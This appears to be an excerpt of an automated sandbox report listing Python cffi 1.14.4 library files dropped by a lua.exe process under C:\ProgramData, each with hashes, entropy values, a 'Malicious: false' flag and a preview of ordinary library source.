C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	527
Entropy (8bit):	4.817055975034606
Encrypted:	false
SSDEEP:	12:Uiy3Har/J/y1YuSqtWFr3H4r/BqsCtvWEvNKXmvHPzXKZQgxcrn:E3W/J/y1ED9eBMIxZQgxcr
MD5:	AC16E83526302ABEEF5BA8068B3AF176
SHA1:	90514A4BC3C7343A4E7F8ECD8D7347A9AA08A6F9
SHA-256:	7193E1E739768F9669EE1DBE6BC565A96616435009DCF3A5034681BC387D4CBD
SHA-512:	A8468AABEE9C54CC78979771F1D5D5884B6C32E0317525C3BD1419019B6DE03CBD4867BBB3B6E25EC2273A31014CC9267E5506E72A26D34499436C480B5F63BD
Malicious:	false
Preview:	__all__ = ['FFI', 'VerificationError', 'VerificationMissing', 'CDefError',.. 'FFIError']....from .api import FFI..from .error import CDefError, FFIError, VerificationError, VerificationMissing..from .error import PkgConfigError....__version__ = "1.14.4"..__version_info__ = (1, 14, 4)....# The verifier module file names are based on the CRC32 of a string that..# contains the following version number. It may be older than __version__..# if nothing is clearly incompatible...__version_verifier_modules__ = "0.8.6"..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\_cffi_errors.h Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4003
Entropy (8bit):	4.922276710465993
Encrypted:	false
SSDEEP:	96:1HpXX5euxHO+eEaWFEHaBWQMIOSzn82oQBWA0x:vXX5rHXFsYMlntA0
MD5:	7017FA698316634043024CCF1B736923
SHA1:	7AC66AC67168E55F2A5689316F1123D0F048AA59
SHA-256:	20D7741B16509DAF134D160D38EAFDFE2172D0565AF3823F287D6A9663E0BA54
SHA-512:	131C0B28970C5915DFFA4B2484C4EB4B2F620E2536DDDDC2A55EFA794D5837E59C1948C657C6E2DE48514506CAA51643C68A22926C3AD155A3304069BCAFE3D2
Malicious:	false
Preview:	#ifndef CFFI_MESSAGEBOX..# ifdef _MSC_VER..# define CFFI_MESSAGEBOX 1..# else..# define CFFI_MESSAGEBOX 0..# endif..#endif......#if CFFI_MESSAGEBOX../* Windows only: logic to take the Python-CFFI embedding logic.. initialization errors and display them in a background thread.. with MessageBox. The idea is that if the whole program closes.. as a result of this problem, then likely it is already a console.. program and you can read the stderr output in the console too... If it is not a console program, then it will likely show its own.. dialog to complain, or generally not abruptly close, and for this.. case the background thread should stay alive.../..static void volatile _cffi_bootstrap_text;....static PyObject _cffi_start_error_capture(void)..{.. PyObject result = NULL;.. PyObject x, m, bi;.... if (InterlockedCompareExchangePointer(&_cffi_bootstrap_text,.. (void )1, NULL) != NULL).. return (PyObject *)1;.... m = PyImport_AddModu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\_cffi_include.h Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15185
Entropy (8bit):	4.7365053814431155
Encrypted:	false
SSDEEP:	192:GdVu3ksqKv34X7tB6oEQwuscJ6OUjCcPhFix0zunQMQGRsM/:Usfv4XDdTUjCcWu4QMQMF/
MD5:	60162CC68F2CBB3582018804DDCCBC50
SHA1:	723F5B290AAD3813F14E315C27C50946432D87A0
SHA-256:	1FB72075947E3CEC26505AC8BA9E23386CE68DEF18A101E137DF6054583BC34F
SHA-512:	5CFAFAEEC90A833AC2BBD9DB955A8165D34171B9AD3A52C5A70D916203703064AF1FC59597053F01B363763C3CA006F96D6BDBCBC70325D37B759D030EEBB457
Malicious:	false
Preview:	#define _CFFI_..../* We try to define Py_LIMITED_API before including Python.h..... Mess: we can only define it if Py_DEBUG, Py_TRACE_REFS and.. Py_REF_DEBUG are not defined. This is a best-effort approximation:.. we can learn about Py_DEBUG from pyconfig.h, but it is unclear if.. the same works for the other two macros. Py_DEBUG implies them,.. but not the other way around..... The implementation is messy (issue #350): on Windows, with _MSC_VER,.. we have to define Py_LIMITED_API even before including pyconfig.h... In that case, we guess what pyconfig.h will do to the macros above,.. and check our guess after the #include..... Note that on Windows, with CPython 3.x, you need >= 3.5 and virtualenv.. version >= 16.0.0. With older versions of either, you don't get a.. copy of PYTHON3.DLL in the virtualenv. We can't check the version of.. CPython before we even include pyconfig.h. ffi.set_source() puts.. a ``#define _CFFI_NO_LIMITED_API'' at the start of

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\_embedding.h Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18108
Entropy (8bit):	4.850169835890813
Encrypted:	false
SSDEEP:	384:0R8AkQGUZQmwEbk16nGldxsjHxO5CWwGqyRaZeW5sgpsLIes6V0UlU+5Sc:h9Q3OVYHWsymeW5sgpMf0UlU+5Sc
MD5:	51C34242EC4E587B86423813FF89AC47
SHA1:	37BDA9E2FC1A7AC4C569E1ECF5B0FA6F5447AB11
SHA-256:	8E0FF2AFB6B41536B0B3843DD41FBA1B5DF8CE049EF0B86806DDFE78DF5D663F
SHA-512:	ECD5D3FB528BCE48FADC93D0A389F2DB9F70CF5DF99220ACFE3CAD61440BA5410C8111E19750F3EF30CB2684A05B06C4932D2DFC16960991F13F99E0FF140428
Malicious:	false
Preview:	../*** Support code for embedding **/....#ifdef __cplusplus..extern "C" {..#endif......#if defined(_WIN32)..# define CFFI_DLLEXPORT __declspec(dllexport)..#elif defined(__GNUC__)..# define CFFI_DLLEXPORT __attribute__((visibility("default")))..#else..# define CFFI_DLLEXPORT / nothing /..#endif....../ There are two global variables of type _cffi_call_python_fnptr:.... * _cffi_call_python, which we declare just below, is the one called.. by ``extern "Python"`` implementations..... * _cffi_call_python_org, which on CPython is actually part of the.. _cffi_exports[] array, is the function pointer copied from.. _cffi_backend..... After initialization is complete, both are equal. However, the.. first one remains equal to &_cffi_start_and_call_python until the.. very end of initialization, when we are (or should be) sure that.. concurrent threads also see a completely initialized world, and.. only then is it changed...*/..#undef _cffi_call_python..typed

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\api.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	43029
Entropy (8bit):	4.412672160524382
Encrypted:	false
SSDEEP:	768:kKJeQpb1BFUz59vDOpVgYcyF6lmB1MbC5iQs1:klQTBFUz5+VgYcyGo1MbC5in1
MD5:	5A45DE88656380A0E8F3BC427A228871
SHA1:	70BE53C5687A88C122CD0FE05F742FFD05DF74D6
SHA-256:	5ECFDD00DE71D5E85F9E7FC5F594DD03709ED1B98FAEA7883A43B861AD6D7DB4
SHA-512:	C827B3418B364ED4ECC02D9CAB3A13B6078172337B53215EFEFA7E1EA3DD94185ABDB9ED3D674040163A9536FEB21C4FB5DCE0CE9EBEE0525DF09C19EB790E8B
Malicious:	false
Preview:	import sys, types..from .lock import allocate_lock..from .error import CDefError..from . import model....try:.. callable..except NameError:.. # Python 3.1.. from collections import Callable.. callable = lambda x: isinstance(x, Callable)....try:.. basestring..except NameError:.. # Python 3.x.. basestring = str...._unspecified = object()........class FFI(object):.. r'''.. The main top-level class that you instantiate once, or once per module..... Example usage:.... ffi = FFI().. ffi.cdef(""".. int printf(const char *, ...);.. """).... C = ffi.dlopen(None) # standard library.. -or-.. C = ffi.verify() # use a C compiler: verify the decl above is right.... C.printf("hello, %s!\n", ffi.new("char[]", "world")).. '''.... def __init__(self, backend=None):.. """Create an FFI instance. The 'backend' argument is used to.. select a non-default backend, mostly for tests... """..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\backend_ctypes.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	43575
Entropy (8bit):	4.218063282147727
Encrypted:	false
SSDEEP:	768:GkDuFHXoojILvkAHv/X8JueLyp1T/XRR98xBId8PRs9DRDiDiDs3uAzsZnuQR3uF:PDuFHXMnHXWo1TpRtsRsFhoosFzsZnud
MD5:	A5157429F58447218DBAFB59DA430992
SHA1:	7F2E4F82BA9D7D4496B1F6E875F68A46BCBD3F9D
SHA-256:	047377AB68222F6FD8F30303493D8221C73FAA832BB3AE6A57D39BE49BF1059E
SHA-512:	0E6580AA65A7DD692F09E9646E5BB427D1B10EF430685FE2498FBE34DFA299BA3CC72BB8563ED6D622DFC33A586E0E1DA2C6051C9F49EF9F522858073957926F
Malicious:	false
Preview:	import ctypes, ctypes.util, operator, sys..from . import model....if sys.version_info < (3,):.. bytechr = chr..else:.. unicode = str.. long = int.. xrange = range.. bytechr = lambda num: bytes([num])....class CTypesType(type):.. pass....class CTypesData(object):.. __metaclass__ = CTypesType.. __slots__ = ['__weakref__'].. __name__ = '<cdata>'.... def __init__(self, args):.. raise TypeError("cannot instantiate %r" % (self.__class__,)).... @classmethod.. def _newp(cls, init):.. raise TypeError("expected a pointer or array ctype, got '%s'".. % (cls._get_c_name(),)).... @staticmethod.. def _to_ctypes(value):.. raise TypeError.... @classmethod.. def _arg_to_ctypes(cls, value):.. try:.. ctype = cls._ctype.. except AttributeError:.. raise TypeError("cannot create an instance of %r" % (cls,)).. if value:.. res = cls._to_ctypes(*value)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\cffi_opcode.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5911
Entropy (8bit):	4.811701778431833
Encrypted:	false
SSDEEP:	96:jyMpP75bQ4bWfKKZDLPGlSRBmFfYxb5CojCx2JjWOh9ddxlwuCwwBrK3gfkNqV6C:9pPtbQtXXGARAFKCojCkh9ddFqV6pU
MD5:	6AFDA5B92BBE029F04B7663959569962
SHA1:	43439A9D06210B478FBC529DBD59AD66854CE595
SHA-256:	E7B3F63472D992E4D6B9E6726EEE62A2C5A58DBEA87109945F31AB0A996B9F21
SHA-512:	CB3EB443E4BE519A25C4F2460AB73143BEA874876A538EF4F6BA6127D0F8742FAC97D356B12D8916C5327ECC8D2B9CD8BFFABD8191E1751A0E7E2EF322D69114
Malicious:	false
Preview:	from .error import VerificationError....class CffiOp(object):.. def __init__(self, op, arg):.. self.op = op.. self.arg = arg.... def as_c_expr(self):.. if self.op is None:.. assert isinstance(self.arg, str).. return '(_cffi_opcode_t)(%s)' % (self.arg,).. classname = CLASS_NAME[self.op].. return '_CFFI_OP(_CFFI_OP_%s, %s)' % (classname, self.arg).... def as_python_bytes(self):.. if self.op is None and self.arg.isdigit():.. value = int(self.arg) # non-negative: '-' not in self.arg.. if value >= 231:.. raise OverflowError("cannot emit %r: limited to 231-1".. % (self.arg,)).. return format_four_bytes(value).. if isinstance(self.arg, str):.. raise VerificationError("cannot emit to Python: %r" % (self.arg,)).. return format_four_bytes((self.arg << 8) \| self.op).... def __str__(self):.. classname

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\commontypes.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2769
Entropy (8bit):	4.892583350453655
Encrypted:	false
SSDEEP:	48:kFIR1NajbrEfJjoLzbjCCP6sWKrFwtCG+wDkDXEcYJaXwtAo+GbQR5oi/z:kFIR1NajbrEh0LXb6sWWEudzEhJaXwtk
MD5:	DE75CAAE98373480D526F71FF9D945E6
SHA1:	7C1BD17B705FF0384EC2375B8C9521BE79297989
SHA-256:	984643E20D2AB5A767BFA3BA0845EF310689D4AE9245B1B94B587862F5591CE5
SHA-512:	CCCB3C86C26F8BC0F1F1C8C22C534376ADDBC0C2A33944387C5847B9C297ADB4F3C0DF9609BD8ABD0173B0F28EDAF5ED543AE2E8A50392A20BE25D642D71536D
Malicious:	false
Preview:	import sys..from . import model..from .error import FFIError......COMMON_TYPES = {}....try:.. # fetch "bool" and all simple Windows types.. from _cffi_backend import _get_common_types.. _get_common_types(COMMON_TYPES)..except ImportError:.. pass....COMMON_TYPES['FILE'] = model.unknown_type('FILE', '_IO_FILE')..COMMON_TYPES['bool'] = '_Bool' # in case we got ImportError above....for _type in model.PrimitiveType.ALL_PRIMITIVE_TYPES:.. if _type.endswith('_t'):.. COMMON_TYPES[_type] = _type..del _type...._CACHE = {}....def resolve_common_type(parser, commontype):.. try:.. return _CACHE[commontype].. except KeyError:.. cdecl = COMMON_TYPES.get(commontype, commontype).. if not isinstance(cdecl, str):.. result, quals = cdecl, 0 # cdecl is already a BaseType.. elif cdecl in model.PrimitiveType.ALL_PRIMITIVE_TYPES:.. result, quals = model.PrimitiveType(cdecl), 0.. elif cdecl == 'set-unicode-needed':..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\cparser.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	45237
Entropy (8bit):	4.353591483539951
Encrypted:	false
SSDEEP:	768:Ypq2UQLhgOgQ0xtm+PBzlfel8dNIB2wQ0:ANgdlfv0b
MD5:	FDC193FB1D2F93042B473B45C0D8FC9C
SHA1:	57BD5784A61AE0BDFCA38D348E1389207F603DA3
SHA-256:	0B0564D95DC04D8942A32C06EB3377E70E9443BCE3D84597EBC2A3A09A763339
SHA-512:	D76C100B328BE48A1695C2E8A0B073DAC60F121D5454CAC1C3937F4CF7C1852C5D4434236A0B949C32D97F43672C6A1B1B55F3226420E1BAF6C68C564E52E924
Malicious:	false
Preview:	from . import model..from .commontypes import COMMON_TYPES, resolve_common_type..from .error import FFIError, CDefError..try:.. from . import _pycparser as pycparser..except ImportError:.. import pycparser..import weakref, re, sys....try:.. if sys.version_info < (3,):.. import thread as _thread.. else:.. import _thread.. lock = _thread.allocate_lock()..except ImportError:.. lock = None....def _workaround_for_static_import_finders():.. # Issue #392: packaging tools like cx_Freeze can not find these.. # because pycparser uses exec dynamic import. This is an obscure.. # workaround. This function is never called... import pycparser.yacctab.. import pycparser.lextab....CDEF_SOURCE_STRING = "<cdef source string>".._r_comment = re.compile(r"/\.?\/\|//([^\n\\]\|\\.)?$",.. re.DOTALL \| re.MULTILINE).._r_define = re.compile(r"^\s#\sdefine\s+([A-Za-z_][A-Za-z_0-9])".. r"\b((?:[^\n\\]\|\\.)?)$",..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\error.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.568727456994481
Encrypted:	false
SSDEEP:	24:VHVCGsq9y5xZhQZ+Abl1AwnXLjwzDcaxQIi:Vn9yVG+ulyzS
MD5:	A80B5D147A6083516A64208A7663D35C
SHA1:	6BA6BB805BD22A16EB2695272E0D349796AC1B88
SHA-256:	0646BB7D2576D9A2209534033C80DFA67C5373569664B31075038963E87F3D40
SHA-512:	78EFD3E5AF113CB537160982FA1C6F881509FFCBDA97D4022B52C78B3136B62C434E3BF5960390D67F0A2518E66D48692DCF0C39960583BCC093B43EE28A8AA7
Malicious:	false
Preview:	..class FFIError(Exception):.. __module__ = 'cffi'....class CDefError(Exception):.. __module__ = 'cffi'.. def __str__(self):.. try:.. current_decl = self.args[1].. filename = current_decl.coord.file.. linenum = current_decl.coord.line.. prefix = '%s:%d: ' % (filename, linenum).. except (AttributeError, TypeError, IndexError):.. prefix = ''.. return '%s%s' % (prefix, self.args[0])....class VerificationError(Exception):.. """ An error raised when verification fails.. """.. __module__ = 'cffi'....class VerificationMissing(Exception):.. """ An error raised when incomplete structures are passed into.. cdef, but no verification has been done.. """.. __module__ = 'cffi'....class PkgConfigError(Exception):.. """ An error raised for missing modules in pkg-config.. """.. __module__ = 'cffi'..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\ffiplatform.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4173
Entropy (8bit):	4.642399057232231
Encrypted:	false
SSDEEP:	96:kLWdgqH9L3tav8GydVBMJNuSPyyRoYRfZOgCr1apsZnh0c6:kagqdLdav8GyvBMJdZRPhec4ho
MD5:	467B1C809572AB4D8117A94F43B260A9
SHA1:	C0B4D714818C19564A1EF2B6540F960947CC202F
SHA-256:	AA2A32749782EB7744BEB43786DE7F04F992B3BC33CF3B969D9009B5F86273B2
SHA-512:	93EA9FC8D1A81CCA5D705C0B6E44F1FE8ACFEE34619FA07C6C1F05799228727354A1A6F3113782374755BD5332EEC062460DBD1DC69C7027E7C0E64F747CFF55
Malicious:	false
Preview:	import sys, os..from .error import VerificationError......LIST_OF_FILE_NAMES = ['sources', 'include_dirs', 'library_dirs',.. 'extra_objects', 'depends']....def get_extension(srcfilename, modname, sources=(), kwds):.. _hack_at_distutils().. from distutils.core import Extension.. allsources = [srcfilename].. for src in sources:.. allsources.append(os.path.normpath(src)).. return Extension(name=modname, sources=allsources, kwds)....def compile(tmpdir, ext, compiler_verbose=0, debug=None):.. """Compile a C extension module using distutils.""".... _hack_at_distutils().. saved_environ = os.environ.copy().. try:.. outputfilename = _build(tmpdir, ext, compiler_verbose, debug).. outputfilename = os.path.abspath(outputfilename).. finally:.. # workaround for a distutils bugs where some env vars can.. # become longer and longer every time it is used.. for key, value in saved_environ.items():..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\lock.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	777
Entropy (8bit):	4.44875139792708
Encrypted:	false
SSDEEP:	24:kUkAK++vkMls+Fvk0nLu8nEA5nMJDc0nM0/DiVaZXm:kU+vPvXnHEMMJDDM0bXm
MD5:	40C9E6614363EA3F735547B5D9764770
SHA1:	2B0337774AF79AA5DBEF29C4F32EE6A757DA08E6
SHA-256:	BE76EC7A5EF7F7621BF2018189F21F01F73B307B5E4B07779CFEF6E69BDCDB94
SHA-512:	27F4B44CD28109322BC5AEF98A1D909D0C843EBDAE2674AD31BEA7C9BE4183F56273BDE821009A55C7B01C7012C4A2310D3BF6DA1E501F075A654AAC517F368D
Malicious:	false
Preview:	import sys....if sys.version_info < (3,):.. try:.. from thread import allocate_lock.. except ImportError:.. from dummy_thread import allocate_lock..else:.. try:.. from _thread import allocate_lock.. except ImportError:.. from _dummy_thread import allocate_lock......##import sys..##l1 = allocate_lock....##class allocate_lock(object):..## def __init__(self):..## self._real = l1()..## def __enter__(self):..## for i in range(4, 0, -1):..## print sys._getframe(i).f_code..## print..## return self._real.__enter__()..## def __exit__(self, args):..## return self._real.__exit__(args)..## def acquire(self, f):..## assert f is False..## return self._real.acquire(f)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\model.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	22385
Entropy (8bit):	4.473459726873564
Encrypted:	false
SSDEEP:	192:h/P/2CB32eKd4sUsW7w6ezywyJypLn/75wZbwMNW5otWpicdjomKNh+g6yyHu5F:XFPTw6SD84LNiwEhWpbjohZ3pH
MD5:	CFF9C6B8372D67221E29D18F0FA4D5B4
SHA1:	1D48C2F71A68C58C174E5C5EB3C654061F73E4A6
SHA-256:	1D10F458460717656BE918D2FB8C329DC125AD9C54DB6E7ACD8D1F6CC91229E7
SHA-512:	3B40703A7A959819B505D3DD98B1AD943CAC0A3A40CF4FFAFF1BB96601BC7D26C21B568397A99A863DAF284144374011789C7FCDFA2FF1DDCCC45290FABF8159
Malicious:	false
Preview:	import types..import weakref....from .lock import allocate_lock..from .error import CDefError, VerificationError, VerificationMissing....# type qualifiers..Q_CONST = 0x01..Q_RESTRICT = 0x02..Q_VOLATILE = 0x04....def qualify(quals, replace_with):.. if quals & Q_CONST:.. replace_with = ' const ' + replace_with.lstrip().. if quals & Q_VOLATILE:.. replace_with = ' volatile ' + replace_with.lstrip().. if quals & Q_RESTRICT:.. # It seems that __restrict is supported by gcc and msvc... # If you hit some different compiler, add a #define in.. # _cffi_include.h for it (and in its copies, documented there).. replace_with = ' __restrict ' + replace_with.lstrip().. return replace_with......class BaseTypeByIdentity(object):.. is_array_type = False.. is_raw_function = False.... def get_c_name(self, replace_with='', context='a C file', quals=0):.. result = self.c_name_with_marker.. assert result.count('&') == 1.. #

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\parse_c_type.h Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6157
Entropy (8bit):	5.002376552404396
Encrypted:	false
SSDEEP:	96:Me94hDwCVNDeiIXOp6MLxgFfAQbJ0Q9uNN56ipS:ODEOCnb6wi8
MD5:	F2B2DED0B0043403AEE90209E4FC8C8E
SHA1:	DA395C86119E5BF80D4C4BFA33A4C164E9CEB279
SHA-256:	7CA60DA96357E5FF6464D3616D77112D33A5A51191861F1E08BC879935C86674
SHA-512:	301B2D38ACF26B8FE1B782824D02DCE9ADFC612AAA753C4FFAA044477F9970C9B3362D0989FB8B55959CCDAB6328715617DC8BDB0FFF926473C47D756AC51469
Malicious:	false
Preview:	../* This part is from file 'cffi/parse_c_type.h'. It is copied at the.. beginning of C sources generated by CFFI's ffi.set_source(). /....typedef void _cffi_opcode_t;....#define _CFFI_OP(opcode, arg) (_cffi_opcode_t)(opcode \| (((uintptr_t)(arg)) << 8))..#define _CFFI_GETOP(cffi_opcode) ((unsigned char)(uintptr_t)cffi_opcode)..#define _CFFI_GETARG(cffi_opcode) (((intptr_t)cffi_opcode) >> 8)....#define _CFFI_OP_PRIMITIVE 1..#define _CFFI_OP_POINTER 3..#define _CFFI_OP_ARRAY 5..#define _CFFI_OP_OPEN_ARRAY 7..#define _CFFI_OP_STRUCT_UNION 9..#define _CFFI_OP_ENUM 11..#define _CFFI_OP_FUNCTION 13..#define _CFFI_OP_FUNCTION_END 15..#define _CFFI_OP_NOOP 17..#define _CFFI_OP_BITFIELD 19..#define _CFFI_OP_TYPENAME 21..#define _CFFI_OP_CPYTHON_BLTN_V 23 // varargs..#define _CFFI_OP_CPYTHON_BLTN_N 25 // noargs..#define _CFFI_OP_CPYTHON_BLTN_O 27 // O (i.e. a single arg)..#define _CFFI_OP_CONSTANT 29

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\pkgconfig.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4495
Entropy (8bit):	4.547024823336294
Encrypted:	false
SSDEEP:	96:SbKeGD9vVuZjh8kMdpM5GC11ySByRO8SvwL0C:SXGD9zkd1USoRO8+wL0C
MD5:	AEB9E43E3DDAD893AAA7BD07FC63CC6D
SHA1:	EA48EE86A813A15C422F34D4DF62BD995F5E1DE8
SHA-256:	F730DC0DFD1728825AC451CB83B7BE5BCF976FC62AE61761A87EE42E0FAE811A
SHA-512:	CA705FBDAA20845548B714A4C613C5268FFA07FF9AF40265CD0AA3265766712DBCED7B2B6735C0C0C8FB90971816B837C7581D53F01B0B3A52734D6C4092E535
Malicious:	false
Preview:	# pkg-config, https://www.freedesktop.org/wiki/Software/pkg-config/ integration for cffi..import sys, os, subprocess....from .error import PkgConfigError......def merge_flags(cfg1, cfg2):.. """Merge values from cffi config flags cfg2 to cf1.... Example:.. merge_flags({"libraries": ["one"]}, {"libraries": ["two"]}).. {"libraries": ["one", "two"]}.. """.. for key, value in cfg2.items():.. if key not in cfg1:.. cfg1[key] = value.. else:.. if not isinstance(cfg1[key], list):.. raise TypeError("cfg1[%r] should be a list of strings" % (key,)).. if not isinstance(value, list):.. raise TypeError("cfg2[%r] should be a list of strings" % (key,)).. cfg1[key].extend(value).. return cfg1......def call(libname, flag, encoding=sys.getfilesystemencoding()):.. """Calls pkg-config and returns the output if found.. """.. a = ["pkg-config", "--print-errors"].. a.append(flag)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\recompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	66149
Entropy (8bit):	4.446209398431634
Encrypted:	false
SSDEEP:	768:GothwAElgyySqwqfjmoVWfA5f8areK4utLZTQqNMotNCdzZWJWNiiaeFXJ:ZeA0gyqwFA5f8areK4kLZFNMaCdzZka
MD5:	2440D4578445F3C6CF582A9E94470C3D
SHA1:	51BA4D6DCD10134028ED208AB9B5991EE69CB4B9
SHA-256:	2E611A947AACF74760A79A1DF818998B3B2ED8CD96255ED2E9CB4D4B18F716C0
SHA-512:	551FA997EDEDD52EE69BFD987D3C193BCB4114774EB759926925525B02FB8B26F0AE5C8BD373BBAB1CB3D79A7927A45C7277A46220AD7FBDB3491AFDF8328BAA
Malicious:	false
Preview:	import os, sys, io..from . import ffiplatform, model..from .error import VerificationError..from .cffi_opcode import ....VERSION_BASE = 0x2601..VERSION_EMBEDDED = 0x2701..VERSION_CHAR16CHAR32 = 0x2801....USE_LIMITED_API = (sys.platform != 'win32' or sys.version_info < (3, 0) or.. sys.version_info >= (3, 5))......class GlobalExpr:.. def __init__(self, name, address, type_op, size=0, check_value=0):.. self.name = name.. self.address = address.. self.type_op = type_op.. self.size = size.. self.check_value = check_value.... def as_c_expr(self):.. return ' { "%s", (void )%s, %s, (void *)%s },' % (.. self.name, self.address, self.type_op.as_c_expr(), self.size).... def as_python_expr(self):.. return "b'%s%s',%d" % (self.type_op.as_python_bytes(), self.name,.. self.check_value)....class FieldExpr:.. def __init__(self, name, field_offset, field_size, fbitsize, field_type_o

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\setuptools_ext.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9150
Entropy (8bit):	4.612241851033373
Encrypted:	false
SSDEEP:	192:AxSxeebo+BQfcDfB/4/y8y55WcR+25p5LoVlm1:AwhnTyyY6
MD5:	F20BFA0472819FCA2DEE010D75BBE263
SHA1:	68DCC250CD1EC18B838B67A5546EEF8560A21CD8
SHA-256:	F32D784CE95102481D7339B0B4F39A87215724737222A84B8D41CC6109A3387B
SHA-512:	2ADBAFE121B6579FC7B9CE1A06FBA9C7100D557FFD0D7EE45FC94DA3F44E3BD2B99D95031B8D611CAD96B6D8CF9536235E2AC0FB43B4085E4E14D21A5710A6E8
Malicious:	false
Preview:	import os..import sys....try:.. basestring..except NameError:.. # Python 3.x.. basestring = str....def error(msg):.. from distutils.errors import DistutilsSetupError.. raise DistutilsSetupError(msg)......def execfile(filename, glob):.. # We use execfile() (here rewritten for Python 3) instead of.. # __import__() to load the build script. The problem with.. # a normal import is that in some packages, the intermediate.. # __init__.py files may already try to import the file that.. # we are generating... with open(filename) as f:.. src = f.read().. src += '\n' # Python 2.6 compatibility.. code = compile(src, filename, 'exec').. exec(code, glob, glob)......def add_cffi_module(dist, mod_spec):.. from cffi.api import FFI.... if not isinstance(mod_spec, basestring):.. error("argument to 'cffi_modules=...' must be a str or a list of str,".. " not %r" % (type(mod_spec).__name__,)).. mod_spec = str(mod_spec)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\vengine_cpy.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	44396
Entropy (8bit):	4.490645461557281
Encrypted:	false
SSDEEP:	384:Ff8sS0nGUcC2InduQ8gsbh6V5zE/t0yPk9RTUniACc0AADi:Ff8F+v8gsbhE5qGy8CilRe
MD5:	4DBF67A8172551EC3431ABF65D22E72A
SHA1:	4BFCABB5868AA6944D8CD0BAA08F2C0C48F12394
SHA-256:	BA4BA028222C511C49CC7C65C52DBAE6D1A341F3D31436D3870B2A06BC0A87E0
SHA-512:	5342A41E18763E724ED2D532B0C835280F2C1B8553E4EDF0F09B64CAD49C62EA5E7E45168B62D926656A74769EAA9951D0220FD59756372190AB9A207CDB0214
Malicious:	false
Preview:	#..# DEPRECATED: implementation for ffi.verify()..#..import sys, imp..from . import model..from .error import VerificationError......class VCPythonEngine(object):.. _class_key = 'x'.. _gen_python_module = True.... def __init__(self, verifier):.. self.verifier = verifier.. self.ffi = verifier.ffi.. self._struct_pending_verification = {}.. self._types_of_builtin_functions = {}.... def patch_extension_kwds(self, kwds):.. pass.... def find_module(self, module_name, path, so_suffixes):.. try:.. f, filename, descr = imp.find_module(module_name, path).. except ImportError:.. return None.. if f is not None:.. f.close().. # Note that after a setuptools installation, there are both .py.. # and .so files with the same basename. The code here relies on.. # imp.find_module() locating the .so in priority... if descr[0] not in so_suffixes:.. return None..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\vengine_gen.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27359
Entropy (8bit):	4.436579405062857
Encrypted:	false
SSDEEP:	192:FfXiHaGA6r8a/V8m5jQ5JGsS0rTWlryQza/ci1CCe7dl2VXVcAwhJEC2o/mYAyIk:FfXs10mZQ5EsD2luQzEICevJhKH5lTUx
MD5:	6A7EA3F9A0C4A4404D1D167DCB8FAD19
SHA1:	7E7EE4A15BB9F2EAA09BA31DB8D6A7711B7FF75E
SHA-256:	9B291484B14921C57A03243970C2779FFEDD6EAC346BD5848D75B413E59F8222
SHA-512:	A4C9DD446EE769C05255A4F842286CCE93C1A0AA70F828813AD4C786D3215484A02607FB701C3825D6D0910AE983F3FBD389982CDC076066C8B04F6700D28827
Malicious:	false
